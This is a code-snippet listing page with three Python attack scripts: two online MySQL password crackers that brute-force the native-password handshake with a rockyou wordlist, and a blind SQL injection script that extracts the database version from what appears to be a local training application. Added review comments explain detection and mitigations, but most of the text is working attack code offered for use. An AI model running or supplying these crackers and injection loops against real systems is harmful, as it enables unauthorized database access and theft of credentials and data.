Best Python code snippet using autotest_python
mysqlcheckMemMapMutiThread.py
Source:mysqlcheckMemMapMutiThread.py  
# Python3 compatible
# Mysql password cracker, works with Secure Password Authentication algorithm
# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html
# Nov 2020
# Author: Ivica Stipovic
# Sidenote: make sure you do not have "skip-grant-tables" in your MySQL config file.
# If you do, any connect attempt will return an OK server response / will allow anonymous access.
# This code is functionally relatively close to the Metasploit auxiliary/scanner/mysql_login module.
#
# Reviewer notes (defensive reading of this listing):
# - Every wordlist entry costs one new TCP connection to port 3306 and one
#   login attempt for the same account, so a run appears server-side as a
#   rapid series of connect / failed-login events from one client address.
# - Server-side controls that limit this kind of online guessing include the
#   MySQL connection_control plugin, per-account FAILED_LOGIN_ATTEMPTS /
#   PASSWORD_LOCK_TIME (MySQL 8.0.19+), restricting which hosts can reach the
#   port, and account passwords that do not appear in common wordlists.
# - "skip-grant-tables" (see the sidenote above) turns authentication off,
#   which is why the author excludes it; on a reachable server it is a
#   misconfiguration in its own right.

import socket
import sys
import time
import timeit
import struct
from hashlib import sha1
import mmap
import threading

# NOTE(review): not read or written anywhere else in the shown listing.
pass_found=0

def calculation(username_binary, TCP_IP,TCP_PORT):
    """Send one login attempt per wordlist line and print the outcome.

    For every line read from the module-level memory map ``m`` the function
    opens a new TCP connection, reads the server greeting, extracts the
    version string and the two salt fragments, computes the SHA-1 challenge
    response, sends a handshake-response packet and inspects the reply.

    Args:
        username_binary: account name as bytes, copied verbatim into the packet.
        TCP_IP: server address handed to ``socket.connect``.
        TCP_PORT: server port handed to ``socket.connect``.

    Returns:
        None; results are printed to stdout.

    Note:
        ``m`` is not a parameter. It is the global created in the ``with``
        block at the bottom of the file, so every thread running this
        function reads from the same map and shares its read position.
        No lock is used around ``m.readline``.
    """
    # Iterate through the passwords, make a hash out of each one.
    # The biggest issue is that network sockets don't fit with CUDA - device IO communication is not managed by CUDA.
    # Network sockets probably require multithreading with CPU.

    dbversion=0   # 0 until this thread has printed the version banner once

    for line in iter(m.readline,b""):   # stops when readline returns b"" (end of the map)

        sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        sock.connect((TCP_IP,TCP_PORT))
        # Server greeting; a single read of at most 1024 bytes.
        version,addr=sock.recvfrom(1024)

        payload_len=version[0]   # first byte of the packet-length field; not used below
        ver_offset=5             # version string starts at the 6th byte (4-byte packet header + protocol-version byte)
        version_len=0
        a=0

        # Count the bytes of the NUL-terminated version string.
        while(version[a+ver_offset]!=0):
            version_len+=1
            a+=1

        if dbversion==0:
            print ("[+] Database version =", version[5:5+version_len].decode('utf-8'))
            dbversion=1

        # You must calculate the version string length to get to the salts:
        # move to the 6th byte of the response and loop until the first \00 terminator,
        # count the bytes and so obtain the length of the version field.

        salt1=version[10+version_len:18+version_len]        # 8 bytes: first salt fragment
        salt2=version[37+version_len:49+version_len]        # 12 bytes: second salt fragment, trailing NUL left out

        salt=salt1+salt2
        salt3=bytearray()
        salt3.extend(salt)

        line2=line.rstrip()   # candidate as bytes, trailing whitespace/newline removed

        # Payload length: 55 fixed bytes plus the username, as a 3-byte little-endian field.
        datalen=int(55+len(username_binary))
        datalen2=datalen.to_bytes(3,'little')

        # hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes
        bytes1 = sha1(line2).digest()

        concat1 = salt3
        concat2 = sha1(sha1(line2).digest()).digest()

        bytes3=bytearray()
        concat=concat1+concat2
        bytes3.extend(concat)
        bytes3=sha1(bytes3).digest()

        hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))   # NOTE(review): shadows the builtin hash()
        pass_hash=hash

        data=datalen2                                          # 3-byte packet length
        data +=b'\x01'                                         # packet number=1
        data +=b'\x0d\xa2'                                     # Client capabilities -> careful with that!!
        data +=b'\x00\x00'                                     # Extended capabilities=0
        data +=b'\x00\x00\x00\x40'                             # Max packet size (0x40000000, little-endian)
        data +=b'\x08'                                         # Charset=8 latin1
        data +=b'\x00' *23                                     # 23 bytes are reserved=0
        data +=username_binary                                 # Username (from input parameter)
        data +=b'\x00'                                         # Username NULL terminator
        data +=b'\x14'                                         # 0x14 = 20: length prefix of the 20-byte SHA-1 response that follows
        data +=pass_hash
        data +=b'\x00'                                         # trailing NUL byte (counted in datalen)

        sock.sendall(data)
        authcode,addr=sock.recvfrom(1024)

        # The byte at index 5 of the reply is what this script treats as "login accepted".
        if authcode[5]==0:
            print ("[+] Password found:",line2)
            sock.close()
            # No break/return follows, so the loop carries on with the next line.

        sock.close()


# End of function/subroutine

if len(sys.argv)!=3:

    print ("Usage: python {} <ip address> <username>".format(sys.argv[0]))
    sys.exit()

TCP_IP          =sys.argv[1]
username        =sys.argv[2]
username_binary =username.encode('utf-8')
TCP_PORT        =3306
data_calculated=b""   # NOTE(review): unused in the shown listing

start = timeit.default_timer()

# we're doing memory mapped file search to speed up stuff
# Start of the subroutine/function

with open("rockyou2.txt","rb") as f:
    # Read-only map of the whole wordlist; `m` becomes the module global that calculation() reads.
    m=mmap.mmap(f.fileno(),length=0,access=mmap.ACCESS_READ)
    passx=m.readline().rstrip()   # moves the map past its first line; passx is not used afterwards

    # Multithreading: two threads run the same function against the same map.
    t1=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))
    t2=threading.Thread(target=calculation,args=(username_binary,TCP_IP,TCP_PORT,))

    t1.start()
    t2.start()

    # Wait for threads to finish

    t1.join()
    t2.join()
    stop = timeit.default_timer()
    execution_time = stop - start

    print("[+] Program Executed in "+str(execution_time))
...mysqlcheck4.py
Source:mysqlcheck4.py  
# Python3 compatible
# Mysql password cracker, works with Secure Password Authentication algorithm
# https://dev.mysql.com/doc/internals/en/secure-password-authentication.html
# Nov 2020
# Author: Ivica Stipovic
# Sidenote: make sure you do not have "skip-grant-tables" in your MySQL config file.
# If you do, any connect attempt will return an OK server response / will allow anonymous access.
# This code is functionally relatively close to the Metasploit auxiliary/scanner/mysql_login module.
#
# Reviewer notes (defensive reading of this listing):
# - Single-threaded: one new TCP connection and one login attempt per wordlist
#   line, all for the same account and from the same client address. That
#   pattern (many error-1045 replies in sequence) is what server logs and
#   network monitoring will show.
# - Controls that limit online guessing against MySQL include the
#   connection_control plugin, per-account FAILED_LOGIN_ATTEMPTS /
#   PASSWORD_LOCK_TIME (MySQL 8.0.19+) and restricting access to the port.

import socket
import sys
import time
import struct
from hashlib import sha1

if len(sys.argv)!=3:

    print ("Usage: python mysqlcheck.py <ip address> <username>")
    sys.exit()

TCP_IP          =sys.argv[1]
username        =sys.argv[2]
username_binary =username.encode('utf-8')
TCP_PORT        =3306

# NOTE(review): the file object is not closed anywhere in the shown lines.
f=open("rockyou2.txt","r")

passx=f.readlines()   # whole wordlist is loaded into memory as text lines

# Iterate through the passwords, make a hash out of each one
dbversion=0   # 0 until the version banner has been printed once

for line in passx:

    sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((TCP_IP,TCP_PORT))
    # Server greeting; a single read of at most 1024 bytes.
    version,addr=sock.recvfrom(1024)

    payload_len=version[0]   # first byte of the packet-length field; not used below
    ver_offset=5             # version string starts at the 6th byte (4-byte packet header + protocol-version byte)
    version_len=0
    a=0

    # Count the bytes of the NUL-terminated version string.
    while(version[a+ver_offset]!=0):
        version_len+=1
        a+=1

    if dbversion==0:
        print ("Database version =", version[5:5+version_len].decode('utf-8'))
        dbversion=1

    # You must calculate the version string length to get to the salts:
    # move to the 6th byte of the response and loop until the first \00 terminator,
    # count the bytes and so obtain the length of the version field.

    salt1=version[10+version_len:18+version_len]        # 8 bytes: first salt fragment
    salt2=version[37+version_len:49+version_len]        # 12 bytes: second salt fragment, trailing NUL left out

    salt=salt1+salt2
    salt3=bytearray()
    salt3.extend(salt)

    line2=line.rstrip()   # candidate as str, trailing whitespace/newline removed

    # Payload length: 55 fixed bytes plus the username, as a 3-byte little-endian field.
    datalen=int(55+len(username_binary))
    datalen2=datalen.to_bytes(3,'little')

    # hash=SHA1(password) XOR SHA1(s+SHA1(SHA1(password))), s=salt of 20 bytes
    bytes1 = sha1(line2.encode('utf-8')).digest()

    concat1 = salt3
    concat2 = sha1(sha1(line2.encode('utf-8')).digest()).digest()

    bytes3=bytearray()
    concat=concat1+concat2
    bytes3.extend(concat)
    bytes3=sha1(bytes3).digest()

    hash=bytearray(x ^ y for x, y in zip(bytes1, bytes3))   # NOTE(review): shadows the builtin hash()
    pass_hash=hash

    data=datalen2                                          # 3-byte packet length
    data +=b'\x01'                                         # packet number=1
    data +=b'\x0d\xa2'                                     # Client capabilities -> careful with that!!
    data +=b'\x00\x00'                                     # Extended capabilities=0
    data +=b'\x00\x00\x00\x40'                             # Max packet size (0x40000000, little-endian)
    data +=b'\x08'                                         # Charset=8 latin1
    data +=b'\x00' *23                                     # 23 bytes are reserved=0
    data +=username_binary                                 # Username (from input parameter)
    data +=b'\x00'                                         # Username NULL terminator
    data +=b'\x14'                                         # 0x14 = 20: length prefix of the 20-byte SHA-1 response that follows
    data +=pass_hash
    data +=b'\x00'                                         # trailing NUL byte (counted in datalen)

    sock.sendall(data)
    authcode,addr=sock.recvfrom(1024)

    # Bytes 21, 4 are 0x0415 little-endian = 1045, MySQL's "access denied" error code.
    # The `== 4` applies to the result of the `and`; it evaluates the same as
    # `authcode[5]==21 and authcode[6]==4`.
    if (authcode[5]==21 and authcode[6])==4:
        print ("Access denied for password:",line2)
    else:
        # Any other reply: a zero byte at index 5 is what the script reports as success.
        if authcode[5]==0:
            print ("Password found:",line2)
    # NOTE(review): the listing on the page stops here; no sock.close() is
    # visible in the shown lines.
...sqli_blind_medium.py
Source:sqli_blind_medium.py  
# NOTE(review): lines 1-2 of the original file are not shown on the page; the
# names `requests` and `BeautifulSoup` used below are presumably imported there.
import urllib

# Boolean-based blind SQL injection exercise against a page served from
# localhost (the path and the `security` cookie look like a local training
# application). Each request asks one yes/no question about @@VERSION and
# reads the answer from the text of the first <pre> element.
#
# Reviewer notes (defensive reading):
# - The technique depends on the target placing the `id` form field into its
#   SQL text unparameterised and returning distinguishable pages for true and
#   false. Binding `id` as a typed parameter removes the first condition.
# - On the wire this is a long run of near-identical POSTs whose `id` value
#   contains `length(` / `ascii(substr(` with an incrementing number, which is
#   straightforward to spot in request logs.

LIMIT = 100  # NOTE(review): never referenced; the loops below hard-code 100 and 127
PHPSESSID = "vj4j0b0s5vo65mdd54ohullaq4"  # NOTE(review): session cookie value committed in source
SECURITY = "medium"


def get_db_version_len():
    """Return the length of the target's ``@@VERSION`` string.

    Lengths 1, 2, 3, ... are tried in turn, one POST per value, until the
    page reports "User ID exists in the database.".

    Raises:
        ValueError: when the 100th attempt is also not confirmed.
    """
    guess = 0
    while True:
        guess += 1
        endpoint = "http://localhost/vulnerabilities/sqli_blind/"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.9",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
        }
        # All traffic is sent through a local intercepting proxy on port 8080.
        proxy_map = {
            "http": "http://127.0.0.1:8080",
            "https": "https://127.0.0.1:8080",
        }
        form = {
            "id": f"1 and length(@@VERSION)={guess}",
            "Submit": "Submit",
        }
        jar = {"PHPSESSID": PHPSESSID, "security": SECURITY}

        reply = requests.post(
            endpoint,
            data=form,
            cookies=jar,
            headers=request_headers,
            proxies=proxy_map,
        )

        # `.pre` is dereferenced without a None check, as in the original.
        page = BeautifulSoup(reply.content.decode(), 'html.parser')
        if page.pre.text == "User ID exists in the database.":
            return guess
        if guess >= 100:
            raise ValueError(f'Tried {guess} time but table len not found')


def get_db_ver_char_ascii(digit):
    """Return the character at 1-based position ``digit`` of ``@@VERSION``.

    Character codes are tried upward from 1, one POST per code.

    Raises:
        ValueError: when no code up to and including 128 is confirmed.
    """
    code = 0
    while True:
        code += 1
        endpoint = "http://localhost/vulnerabilities/sqli_blind/"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "en-US,en;q=0.9",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1",
        }
        proxy_map = {
            "http": "http://127.0.0.1:8080",
            "https": "https://127.0.0.1:8080",
        }
        form = {
            "id": f"1 and ascii(substr(@@VERSION,{digit},1))={code}",
            "Submit": "Submit",
        }
        jar = {"PHPSESSID": PHPSESSID, "security": SECURITY}

        reply = requests.post(
            endpoint,
            data=form,
            cookies=jar,
            headers=request_headers,
            proxies=proxy_map,
        )

        page = BeautifulSoup(reply.content.decode(), 'html.parser')
        if page.pre.text == "User ID exists in the database.":
            return chr(code)
        if code > 127:
            raise ValueError(f'char not found on {digit}')


def get_db_ver(name_len):
    """Assemble the version string from positions 1..``name_len``."""
    return "".join(
        get_db_ver_char_ascii(position) for position in range(1, name_len + 1)
    )


if __name__ == "__main__":
    db_version_len = get_db_version_len()
    print(db_version_len)
    db_version = get_db_ver(db_version_len)
    print(db_version)
    # ... (the page's listing stops here)
